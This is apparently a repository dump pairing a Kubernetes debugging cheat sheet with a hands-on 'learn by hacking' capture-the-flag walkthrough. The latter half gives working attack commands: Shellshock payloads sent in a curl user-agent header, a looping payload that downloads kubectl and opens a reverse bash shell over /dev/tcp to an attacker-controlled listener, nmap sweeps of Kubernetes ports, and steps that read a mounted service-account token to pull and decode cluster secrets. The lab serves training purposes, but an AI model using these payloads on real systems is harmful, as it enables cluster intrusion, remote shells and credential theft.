├── Learn by Hacking.pdf └── k8s_cheatsheet.md /Learn by Hacking.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/calinah/learn-by-hacking-kccn/HEAD/Learn by Hacking.pdf -------------------------------------------------------------------------------- /k8s_cheatsheet.md: -------------------------------------------------------------------------------- 1 | This guide has been created to help engineers debug applications that are deployed into Kubernetes and not behaving correctly. 2 | 3 | ## Pod & Container Introspection 4 | 5 | | Command | Description | 6 | | ------------------------------------------------------------ | ------------------------------------------------------------ | 7 | | `kubectl get pods` | lists the current pods in the current namespace | 8 | | `kubectl get pods -w` | watches pods continuously | 9 | | `kubectl describe pod ` | describe pod | 10 | | `kubectl get rc` | list the replication controllers | 11 | | `kubectl get services` or `kubectl get svc` | list the services in the current namespace | 12 | | `kubectl describe service ` or `kubectl describe svc ` | describe service | 13 | | `kubectl delete pod ` | delete pod | 14 | | `kubectl get pods -o wide –w` | watch pods continuously and show
info such as IP addresses & nodes provisioned on | 15 | 16 | ## Cluster Introspection 17 | 18 | | Command | Description | 19 | | :----------------------------- | :----------------------------------------------------------- | 20 | | `kubectl version` | get version info | 21 | | `kubectl cluster-info` | get cluster info | 22 | | `kubectl config view` | get cluster config | 23 | | `kubectl describe node ` | output info about a node | 24 | | `kubectl get nodes –w` | watch nodes continuously | 25 | | `kubectl get nodes -o wide` | gives a detailed view of nodes - including internal & external IP address | 26 | 27 | ## Debugging 28 | 29 | | Command | Description | 30 | | ------------------------------------------------------------ | ------------------------------------------------------------ | 31 | | `kubectl exec -ti [-c ]` | execute command on pod , optionally on a
given container | 32 | | `klog [-c ]` or
`kubectl logs -f [-c `] | get logs of a given pod or optionally container | 33 | | | | 34 | | | | 35 | 36 | ## Networking 37 | 38 | | Command | Description | 39 | | ------------------------------------------------------------ | ----------------------------------------- | 40 | | `kubectl exec -ti -- /bin/sh -c "curl -v
telnet://:"` | testing TCP connectivity between services | 41 | | | | 42 | | | | 43 | | | | 44 | 45 | ## Other resources 46 | 47 | - check whether an action is allowed in your Kubernetes cluster 48 | 49 | Use `amicontained` to find out what container runtime you're using as well as what capabilities the your container has. 50 | 51 | ``` 52 | # Export the sha256sum for verification. 53 | $ export AMICONTAINED_SHA256="4e32545f68f25bcbcd4cce82743e916a054e1686df44fab68420fc9f94f80b21" 54 | 55 | # Download and check the sha256sum. 56 | $ curl -fSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.7/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" \ 57 | && echo "${AMICONTAINED_SHA256} /usr/local/bin/amicontained" | sha256sum -c - \ 58 | && chmod a+x "/usr/local/bin/amicontained" 59 | 60 | $ echo "amicontained installed!" 61 | 62 | # Run it! 63 | $ amicontained -h 64 | ``` 65 | 66 | Add these functions to your environment so that you can scan for open ports 67 | 68 | ``` sudo apt-get update 69 | sudo apt-get install nmap 70 | nmap-kube () 71 | { 72 | nmap --open -T4 -A -v -Pn -p 443,2379,4194,6782-6784,6443,8443,8080,9099,10250,10255,10256 "${@}" 73 | } 74 | nmap-kube-discover () { 75 | local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,'); 76 | local SERVER_RANGES=" "; 77 | SERVER_RANGES+="10.0.0.1 "; 78 | SERVER_RANGES+="10.0.1.* "; 79 | SERVER_RANGES+="10.*.0-1.* "; 80 | nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}" 81 | } 82 | nmap-kube-discover 83 | ``` 84 | 85 | Part 1: compromise via shellshock 86 | 87 | Useful commands for finding open ports: 88 | 89 | ``` 90 | command nmap -Pn -T4 -F --open 91 | # scanning every port, more is open 92 | command nmap -Pn -T4 --open -p 0-65535 93 | command nmap -Pn -T4 --open -p 30081 94 | ``` 95 | 96 | 1. Check shellshock 97 | 98 | ``` 99 | curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "cat /etc/passwd"' 100 | ``` 101 | 102 | 2. create a control server to use as a reverse shell endpoint 103 | 104 | this requires any node with a public IP (a digital ocean server would do) 105 | 106 | ``` 107 | # replace `controlplane` with a host that you can SSH to 108 | ssh controlplane ip a 109 | 110 | # replace 1234 with a port that is routable on the host you have SSH'd into 111 | while :; do ssh controlplane ncat --listen 1234 --output $(mktemp /tmp/hack-XXXX.log); done 112 | ``` 113 | 114 | 3. shellshock in 115 | 116 | 117 | 118 | ``` 119 | curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "echo hello"' 120 | ``` 121 | 122 | Hardcore version: 123 | 124 | ``` 125 | while :; do curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "test -f /tmp/k || wget -O /tmp/k https://storage.googleapis.com/kubernetes-release/release/v1.11.2/bin/linux/amd64/kubectl && chmod +x /tmp/k && /tmp/k version; df -h; while :; do nohup bash -i >& /dev/tcp//1234 0>&1; sleep 1; done"'; done 126 | ``` 127 | 128 | Part 2: 129 | 130 | Kubectl SA: steal secret with ssh password in (flag) 131 | 132 | ### Steps 133 | 134 | 1. on the control server, or via individual shellshock commands: 135 | 136 | Search for secrets: 137 | 138 | ``` 139 | df -h 140 | cat /run/secrets/kubernetes.io/serviceaccount/token; echo 141 | 142 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get nodes 143 | 144 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify auth can-i get secrets --namespace kube-system 145 | ``` 146 | 147 | 2. pull secrets from the API server for this namespace (there's a service account mounted that can read kube-system) 148 | 149 | ``` 150 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secrets -n shellshock 151 | ``` 152 | 153 | 3. we've found secrets, now decode them 154 | 155 | > first way requires manual base64 decode, second is a one-liner 156 | 157 | ``` 158 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --request-timeout 5s --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -o yaml -n shellshock 159 | 160 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -n shellshock -o 'go-template={{index .data "ssh_password"}}' | base64 -d; echo 161 | ``` 162 | 163 | 4. find password for ssh server in flag 164 | 165 | 5. write password in local file to win (or just tell ControlPlane!) TODO(low): write test for this 166 | 167 | ``` 168 | echo 'What kind of plane is it?' > /tmp/flag 169 | ``` --------------------------------------------------------------------------------